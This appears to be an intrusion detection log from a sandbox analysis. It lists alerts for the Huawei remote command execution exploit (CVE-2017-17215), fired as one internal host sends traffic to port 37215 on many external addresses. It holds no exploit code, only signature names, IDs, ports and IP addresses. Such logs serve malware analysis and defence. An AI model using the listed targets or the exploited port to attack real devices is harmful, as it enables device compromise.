                                                    07/10/24-08:26:43.638396TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5186637215192.168.2.14197.149.74.182
                                                    07/10/24-08:26:38.584123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4508837215192.168.2.14157.159.207.101
                                                    07/10/24-08:27:03.003897TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4357037215192.168.2.1441.36.172.240
                                                    07/10/24-08:27:08.454232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5866437215192.168.2.1441.187.110.175
                                                    07/10/24-08:26:57.644926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6043437215192.168.2.14197.9.141.36
                                                    07/10/24-08:26:11.572595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815237215192.168.2.14197.124.185.106
                                                    07/10/24-08:27:23.965651TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5257637215192.168.2.14157.201.174.240
                                                    07/10/24-08:26:55.283062TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4457037215192.168.2.14197.95.206.203
                                                    07/10/24-08:27:33.854360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5688037215192.168.2.14136.191.19.248
                                                    07/10/24-08:27:05.156070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5145437215192.168.2.14157.175.166.11
                                                    07/10/24-08:27:10.609490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4426637215192.168.2.1441.211.53.125
                                                    07/10/24-08:27:13.808295TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5196637215192.168.2.1441.142.130.116
                                                    07/10/24-08:27:13.961699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3559037215192.168.2.14197.84.232.23
                                                    07/10/24-08:27:24.990905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4039637215192.168.2.14157.214.214.34
                                                    07/10/24-08:26:51.917440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5866637215192.168.2.14157.219.16.194
                                                    07/10/24-08:27:17.030907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5242037215192.168.2.14128.213.0.99
                                                    07/10/24-08:27:17.027342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4925237215192.168.2.1469.168.113.115
                                                    07/10/24-08:27:31.468689TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5838037215192.168.2.14197.100.17.24
                                                    07/10/24-08:26:20.148495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4465637215192.168.2.14197.132.42.198
                                                    07/10/24-08:26:59.634541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6031237215192.168.2.142.141.160.13
                                                    07/10/24-08:26:29.857933TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4450837215192.168.2.14212.57.73.175
                                                    07/10/24-08:26:28.834166TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3708637215192.168.2.14157.69.138.150
                                                    07/10/24-08:27:02.733003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4843237215192.168.2.14157.255.115.124
                                                    07/10/24-08:26:22.256759TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3520637215192.168.2.14101.234.69.144
                                                    07/10/24-08:27:22.924312TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3547037215192.168.2.14197.155.72.95
                                                    07/10/24-08:26:28.767416TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3915437215192.168.2.1441.31.254.153
                                                    07/10/24-08:27:05.164336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4533237215192.168.2.1441.149.209.243
                                                    07/10/24-08:27:33.866007TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5754837215192.168.2.1441.187.79.163
                                                    07/10/24-08:27:08.398015TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4643037215192.168.2.14197.19.84.165
                                                    07/10/24-08:26:36.429054TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4661237215192.168.2.1441.160.143.248
                                                    07/10/24-08:26:53.152764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4007237215192.168.2.14165.207.158.40
                                                    07/10/24-08:27:22.872449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5009837215192.168.2.1441.14.56.253
                                                    07/10/24-08:26:38.609301TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124837215192.168.2.14211.112.64.46
                                                    07/10/24-08:27:27.057215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4606637215192.168.2.14197.62.244.214
                                                    07/10/24-08:26:20.145425TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940637215192.168.2.14174.33.150.166
                                                    07/10/24-08:26:52.011560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5184837215192.168.2.14197.189.50.26
                                                    07/10/24-08:26:18.022259TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4145037215192.168.2.14197.169.211.22
                                                    07/10/24-08:26:55.330413TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5132037215192.168.2.14157.143.103.46
                                                    07/10/24-08:26:53.184219TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5681837215192.168.2.1441.28.250.224
                                                    07/10/24-08:27:02.823205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4142037215192.168.2.1441.95.46.119
                                                    07/10/24-08:27:07.388758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4669637215192.168.2.14116.29.48.243
                                                    07/10/24-08:26:52.055054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3808037215192.168.2.14157.104.14.168
                                                    07/10/24-08:27:19.294251TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4803237215192.168.2.1441.145.131.133
                                                    07/10/24-08:27:11.479148TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5710437215192.168.2.1441.126.71.48
                                                    07/10/24-08:26:25.446439TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5417637215192.168.2.14197.47.216.112
                                                    07/10/24-08:26:20.122842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4470437215192.168.2.14170.176.88.38
                                                    07/10/24-08:26:26.585190TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4800637215192.168.2.14101.77.120.207
                                                    07/10/24-08:27:22.861640TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684637215192.168.2.14195.158.232.105
                                                    07/10/24-08:26:26.602369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3425037215192.168.2.142.250.113.60
                                                    07/10/24-08:26:57.566526TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5316637215192.168.2.14157.32.176.173
                                                    07/10/24-08:27:28.180841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5880037215192.168.2.14157.156.252.103
                                                    07/10/24-08:27:33.931783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5610637215192.168.2.1441.218.17.254
                                                    07/10/24-08:26:23.360757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5217837215192.168.2.14197.16.131.63
                                                    07/10/24-08:26:55.412388TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4821437215192.168.2.14124.183.166.184
                                                    07/10/24-08:26:55.470125TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3306837215192.168.2.14157.121.242.248
                                                    07/10/24-08:26:53.152764TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5386437215192.168.2.1441.241.233.107
                                                    07/10/24-08:27:24.975422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4047237215192.168.2.1441.115.113.250
                                                    07/10/24-08:27:14.853796TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5530037215192.168.2.1441.190.219.39
                                                    07/10/24-08:26:11.658896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3713237215192.168.2.14197.246.39.163
                                                    07/10/24-08:27:22.763927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479637215192.168.2.1441.41.241.21
                                                    07/10/24-08:26:29.835368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4070637215192.168.2.1441.66.252.76
                                                    07/10/24-08:26:26.573174TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5562837215192.168.2.1441.50.60.149
                                                    07/10/24-08:26:41.524750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3660637215192.168.2.14157.80.147.95
                                                    07/10/24-08:26:59.562585TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3356237215192.168.2.14189.127.144.108
                                                    07/10/24-08:27:33.919231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4232837215192.168.2.1441.66.179.211
                                                    07/10/24-08:27:11.551943TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125237215192.168.2.1441.229.20.80
                                                    07/10/24-08:27:11.566037TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463837215192.168.2.1437.244.191.224
                                                    07/10/24-08:26:23.284059TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374237215192.168.2.14157.9.43.60
                                                    07/10/24-08:26:26.586309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4549437215192.168.2.1441.34.101.238
                                                    07/10/24-08:26:53.205499TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3728037215192.168.2.14157.82.169.236
                                                    07/10/24-08:26:52.051203TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4683637215192.168.2.1441.81.180.33
                                                    07/10/24-08:26:23.313392TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4097037215192.168.2.14212.202.89.137
                                                    07/10/24-08:26:15.876797TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4742837215192.168.2.14197.34.34.66
                                                    07/10/24-08:26:36.440414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4511037215192.168.2.14157.73.6.43
                                                    07/10/24-08:27:36.290826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5361637215192.168.2.14197.155.185.68
                                                    07/10/24-08:27:28.173873TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4680837215192.168.2.14157.103.162.85
                                                    07/10/24-08:27:17.077286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4411237215192.168.2.14157.67.170.209
                                                    07/10/24-08:26:43.798286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3368637215192.168.2.14157.181.227.139
                                                    07/10/24-08:27:20.518150TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3380037215192.168.2.1441.199.214.183
                                                    07/10/24-08:26:41.578740TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5583037215192.168.2.1441.81.60.152
                                                    07/10/24-08:27:20.488674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4484637215192.168.2.14157.219.18.50
                                                    07/10/24-08:27:24.920264TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3673037215192.168.2.1468.246.28.230
                                                    07/10/24-08:26:55.407973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4218437215192.168.2.14209.118.128.54
                                                    07/10/24-08:27:22.933936TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3287637215192.168.2.14117.76.38.158
                                                    07/10/24-08:26:14.786182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4287437215192.168.2.1441.93.117.255
                                                    07/10/24-08:26:51.970801TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4077837215192.168.2.1441.167.100.246
                                                    07/10/24-08:27:05.193569TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478837215192.168.2.14197.86.3.200
                                                    07/10/24-08:26:11.136584TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5042037215192.168.2.1441.30.137.212
                                                    07/10/24-08:26:52.081340TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4115437215192.168.2.14157.74.135.24
                                                    07/10/24-08:27:10.613863TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3377237215192.168.2.14197.88.39.244
                                                    07/10/24-08:27:27.158777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5003037215192.168.2.14197.246.139.195
                                                    07/10/24-08:26:11.123871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158037215192.168.2.14219.72.118.94
                                                    07/10/24-08:26:34.239343TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5577237215192.168.2.1441.167.244.253
                                                    07/10/24-08:26:59.658775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5753437215192.168.2.1441.204.62.151
                                                    07/10/24-08:27:28.093525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4849437215192.168.2.14170.47.142.199
                                                    07/10/24-08:26:18.030182TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4602837215192.168.2.14197.102.83.112
                                                    07/10/24-08:26:28.801971TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4214837215192.168.2.14125.235.182.101
                                                    07/10/24-08:27:33.730213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4821237215192.168.2.1491.84.108.231
                                                    07/10/24-08:26:14.621778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4036437215192.168.2.1414.190.67.82
                                                    07/10/24-08:27:27.053819TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3600237215192.168.2.14148.130.98.72
                                                    07/10/24-08:26:42.361617TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984637215192.168.2.1498.79.42.175
                                                    07/10/24-08:26:59.534289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3709037215192.168.2.1441.66.69.67
                                                    07/10/24-08:27:30.538368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6007437215192.168.2.1441.254.133.209
                                                    07/10/24-08:26:26.516253TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607037215192.168.2.14209.205.6.145
                                                    07/10/24-08:26:38.619683TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4924437215192.168.2.1441.90.39.196
                                                    07/10/24-08:27:08.389213TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3613237215192.168.2.1441.19.88.114
                                                    07/10/24-08:27:19.303289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3352237215192.168.2.1441.199.227.15
                                                    07/10/24-08:26:34.197956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4360037215192.168.2.1441.180.225.227
                                                    07/10/24-08:26:59.751989TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782837215192.168.2.14222.32.131.246
                                                    07/10/24-08:26:26.527287TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5068437215192.168.2.14201.67.9.127
                                                    07/10/24-08:26:36.373847TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3412437215192.168.2.14204.134.202.240
                                                    07/10/24-08:26:55.349014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5949237215192.168.2.14197.56.158.26
                                                    07/10/24-08:27:20.514336TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4160837215192.168.2.14197.100.201.248
                                                    07/10/24-08:26:14.791057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3282237215192.168.2.14197.208.39.79
                                                    07/10/24-08:27:33.823408TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5285037215192.168.2.14157.172.165.254
                                                    07/10/24-08:27:08.435452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4827837215192.168.2.14117.159.8.80
                                                    07/10/24-08:27:07.329948TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4516837215192.168.2.1441.50.6.221
                                                    07/10/24-08:26:25.492137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287637215192.168.2.1441.197.25.242
                                                    07/10/24-08:26:36.397688TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6016637215192.168.2.1441.34.178.20
                                                    07/10/24-08:27:05.189458TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5901037215192.168.2.149.202.64.40
                                                    07/10/24-08:26:29.851044TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3909437215192.168.2.14197.192.27.206
                                                    07/10/24-08:27:13.803034TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4929237215192.168.2.14197.67.72.113
                                                    07/10/24-08:26:49.792004TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3883237215192.168.2.14157.16.214.109
                                                    07/10/24-08:26:55.433645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842037215192.168.2.14197.237.94.28
                                                    07/10/24-08:27:23.831762TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5984237215192.168.2.14197.14.118.204
                                                    07/10/24-08:26:14.819309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4263837215192.168.2.14197.182.123.43
                                                    07/10/24-08:26:43.881879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5471037215192.168.2.14157.46.9.65
                                                    07/10/24-08:26:47.933430TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4539237215192.168.2.14197.206.196.56
                                                    07/10/24-08:27:30.522972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4772837215192.168.2.14197.189.195.251
                                                    07/10/24-08:26:23.356151TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4565437215192.168.2.1441.136.55.227
                                                    07/10/24-08:26:28.901857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4811037215192.168.2.1441.250.33.117
                                                    07/10/24-08:26:59.652000TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5851437215192.168.2.1441.82.90.154
                                                    07/10/24-08:27:02.692447TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5940437215192.168.2.14157.152.11.231
                                                    07/10/24-08:27:17.078951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054437215192.168.2.14157.151.168.56
                                                    07/10/24-08:27:27.143862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5779637215192.168.2.1441.242.200.27
                                                    07/10/24-08:26:59.766044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3437037215192.168.2.14157.45.216.115
                                                    07/10/24-08:27:02.970301TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5075437215192.168.2.14197.10.176.71
                                                    07/10/24-08:26:26.622039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514437215192.168.2.14157.189.148.40
                                                    07/10/24-08:27:34.132992TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4120037215192.168.2.1441.156.250.16
                                                    07/10/24-08:26:20.176669TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3896637215192.168.2.1445.38.104.24
                                                    07/10/24-08:27:22.872041TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4947637215192.168.2.14157.225.64.149
                                                    07/10/24-08:26:41.611140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5514237215192.168.2.14197.68.107.132
                                                    07/10/24-08:26:11.594883TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4674237215192.168.2.14112.105.52.174
                                                    07/10/24-08:26:38.536872TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5420037215192.168.2.1441.240.161.85
                                                    07/10/24-08:26:36.337218TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3985437215192.168.2.1441.160.122.187
                                                    07/10/24-08:27:13.752380TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5490437215192.168.2.14157.106.116.220
                                                    07/10/24-08:26:25.464906TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699637215192.168.2.14157.18.60.250
                                                    07/10/24-08:26:31.103599TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4373837215192.168.2.14142.109.127.97
                                                    07/10/24-08:26:47.746309TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5555637215192.168.2.14197.154.175.232
                                                    07/10/24-08:27:33.897837TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5656037215192.168.2.1441.234.193.229
                                                    07/10/24-08:27:13.850530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5798237215192.168.2.1441.163.208.102
                                                    07/10/24-08:27:08.369932TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3677037215192.168.2.1467.20.189.123
                                                    07/10/24-08:27:19.216648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3862637215192.168.2.14197.194.193.94
                                                    07/10/24-08:27:31.548799TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4842037215192.168.2.14157.28.244.185
                                                    07/10/24-08:26:43.607360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5848437215192.168.2.1441.232.65.189
                                                    07/10/24-08:26:47.783932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5488437215192.168.2.14157.180.123.228
                                                    07/10/24-08:26:59.553454TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4585837215192.168.2.14181.91.99.73
                                                    07/10/24-08:26:11.190185TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5277437215192.168.2.1432.202.29.246
                                                    07/10/24-08:27:20.488925TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3983837215192.168.2.14157.97.122.101
                                                    07/10/24-08:27:31.565038TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964237215192.168.2.1441.253.19.73
                                                    07/10/24-08:26:15.862612TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4899637215192.168.2.1452.214.121.84
                                                    07/10/24-08:26:42.370948TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4164037215192.168.2.14157.124.61.206
                                                    07/10/24-08:27:22.912600TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3517837215192.168.2.14197.138.199.178
                                                    07/10/24-08:26:55.412009TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5940437215192.168.2.14197.214.112.190
                                                    07/10/24-08:26:57.505236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5469237215192.168.2.1435.68.131.185
                                                    07/10/24-08:27:31.538076TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4149037215192.168.2.14197.37.219.194
                                                    07/10/24-08:26:59.875965TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5947837215192.168.2.1441.31.50.133
                                                    07/10/24-08:27:14.860796TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011637215192.168.2.14157.232.230.137
                                                    07/10/24-08:26:43.927826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5348237215192.168.2.14211.209.44.62
                                                    07/10/24-08:26:11.530156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5439637215192.168.2.14197.211.79.230
                                                    07/10/24-08:26:57.682108TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5291837215192.168.2.14129.97.225.185
                                                    07/10/24-08:26:59.611228TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5767437215192.168.2.14157.235.30.213
                                                    07/10/24-08:26:29.861984TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3350037215192.168.2.14156.254.174.72
                                                    07/10/24-08:27:33.794949TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5552437215192.168.2.1441.80.88.62
                                                    07/10/24-08:27:20.420210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5916837215192.168.2.1441.185.78.240
                                                    07/10/24-08:26:42.437596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4153437215192.168.2.14152.216.46.171
                                                    07/10/24-08:26:49.844919TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6092637215192.168.2.14197.178.86.186
                                                    07/10/24-08:26:52.077257TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344237215192.168.2.1441.97.222.1
                                                    07/10/24-08:27:05.138927TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4628237215192.168.2.1441.166.169.157
                                                    07/10/24-08:27:10.625471TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5295637215192.168.2.14164.61.139.18
                                                    07/10/24-08:26:38.585577TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5226037215192.168.2.14197.131.210.44
                                                    07/10/24-08:27:07.361334TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3597637215192.168.2.14157.218.171.95
                                                    07/10/24-08:27:22.913533TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3872637215192.168.2.14114.82.7.93
                                                    07/10/24-08:27:05.115826TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3373437215192.168.2.1441.68.195.103
                                                    07/10/24-08:27:31.561854TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4690037215192.168.2.14174.174.202.103
                                                    07/10/24-08:26:41.571584TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3492237215192.168.2.1424.101.209.2
